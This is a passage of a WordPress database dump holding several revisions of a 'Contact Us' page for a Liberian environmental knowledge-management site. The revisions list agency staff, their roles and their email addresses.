sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer<br>\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\n<br>\nMEAs Coordinator\n<br>\nUNFCCC Focal Point\n<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a><strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat\n<a href=\"mailto:jsokanst7@yahoo.com\">jsokanst7@yahoo.com</a>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\n<br>\nMEAs Coordinator\n<br>\nUNFCCC Focal Point\n<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 14:42:33','2019-11-15 14:42:33','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2335,1,'2019-11-15 14:46:38','2019-11-15 14:46:38','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer<br>\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\n<br>\nMEAs Coordinator\n<br>\nUNFCCC Focal Point\n<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a><strong>Jeremiah Sokan Sr</strong><br>\nCoordinator Climate Change Secretariat<br>\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a>\n<strong>John K. Jallah</strong>\nManager, Compliance and Enforcement\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 14:46:38','2019-11-15 14:46:38','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2336,1,'2019-11-15 14:47:38','2019-11-15 14:47:38','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer<br>\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\n<br>\nMEAs Coordinator\n<br>\nUNFCCC Focal Point\n<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a><strong>Jeremiah Sokan Sr</strong><br>\nCoordinator Climate Change Secretariat<br>\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a>\n<strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 14:47:38','2019-11-15 14:47:38','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2337,1,'2019-11-15 14:49:11','2019-11-15 14:49:11','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer<br>\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\n<br>\nMEAs Coordinator\n<br>\nUNFCCC Focal Point\n<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a><strong>Jeremiah Sokan Sr</strong><br>\nCoordinator Climate Change Secretariat<br>\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a>\n<strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 14:49:11','2019-11-15 14:49:11','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2338,1,'2019-11-15 14:51:20','2019-11-15 14:51:20','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer<br>\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\n<br>\nMEAs Coordinator\n<br>\nUNFCCC Focal Point\n<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a><strong>Jeremiah Sokan Sr</strong><br>\nCoordinator Climate Change Secretariat<br>\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a>\n<strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong>\nEIA Manager, FDA\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 14:51:20','2019-11-15 14:51:20','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2339,1,'2019-11-15 14:51:36','2019-11-15 14:51:36','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer<br>\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\n<br>\nMEAs Coordinator\n<br>\nUNFCCC Focal Point\n<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a><strong>Jeremiah Sokan Sr</strong><br>\nCoordinator Climate Change Secretariat<br>\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a>\n<strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 14:51:36','2019-11-15 14:51:36','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2340,1,'2019-11-15 14:52:33','2019-11-15 14:52:33','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer<br>\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\n<br>\nMEAs Coordinator\n<br>\nUNFCCC Focal Point\n<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a><strong>Jeremiah Sokan Sr</strong><br>\nCoordinator Climate Change Secretariat<br>\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a>\n<strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\nMarketing and Forest Forecast \n<a href=\"mailto:Kamara.ed14@gmail.com\">Kamara.ed14@gmail.com</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 14:52:33','2019-11-15 14:52:33','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2341,1,'2019-11-15 14:52:53','2019-11-15 14:52:53','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer<br>\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\n<br>\nMEAs Coordinator\n<br>\nUNFCCC Focal Point\n<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a><strong>Jeremiah Sokan Sr</strong><br>\nCoordinator Climate Change Secretariat<br>\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a>\n<strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:Kamara.ed14@gmail.com\">Kamara.ed14@gmail.com</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 14:52:53','2019-11-15 14:52:53','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2342,1,'2019-11-15 14:54:30','2019-11-15 14:54:30','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer<br>\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\n<br>\nMEAs Coordinator\n<br>\nUNFCCC Focal Point\n<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a><strong>Jeremiah Sokan Sr</strong><br>\nCoordinator Climate Change Secretariat<br>\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a>\n<strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:Kamara.ed14@gmail.com\">Kamara.ed14@gmail.com</a><strong>Blamah Goll</strong>\nConservation Manager, FDA\n<a href=\"mailto:blamahg@yahoo.com\">blamag@gmail.com </a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 14:54:30','2019-11-15 14:54:30','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2343,1,'2019-11-15 14:54:49','2019-11-15 14:54:49','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer<br>\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\n<br>\nMEAs Coordinator\n<br>\nUNFCCC Focal Point\n<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a><strong>Jeremiah Sokan Sr</strong><br>\nCoordinator Climate Change Secretariat<br>\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a>\n<strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:Kamara.ed14@gmail.com\">Kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamahg@yahoo.com\">blamag@gmail.com </a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 14:54:49','2019-11-15 14:54:49','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2344,1,'2019-11-15 14:55:13','2019-11-15 14:55:13','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer<br>\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\n<br>\nMEAs Coordinator\n<br>\nUNFCCC Focal Point\n<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><p><strong>Berexford S. Jallah</strong></p><p>GIS Coordinator</p><p>UNCCD Focal Point</p><p><a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a></p><strong>Jeremiah Sokan Sr</strong><br>\nCoordinator Climate Change Secretariat<br>\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a>\n<strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:Kamara.ed14@gmail.com\">Kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamahg@yahoo.com\">blamag@gmail.com </a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 14:55:13','2019-11-15 14:55:13','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2345,1,'2019-11-15 14:56:30','2019-11-15 14:56:30','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer<br>\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\n<br>\nMEAs Coordinator\n<br>\nUNFCCC Focal Point\n<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a><strong>Jeremiah Sokan Sr</strong><br>\nCoordinator Climate Change Secretariat<br>\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a>\n<strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:Kamara.ed14@gmail.com\">Kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamahg@yahoo.com\">blamag@gmail.com </a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 14:56:30','2019-11-15 14:56:30','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2346,1,'2019-11-15 14:57:14','2019-11-15 14:57:14','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer<br>\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\n<br>\nMEAs Coordinator\n<br>\nUNFCCC Focal Point\n<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator<br>\nUNCCD Focal Point<br>\n<a 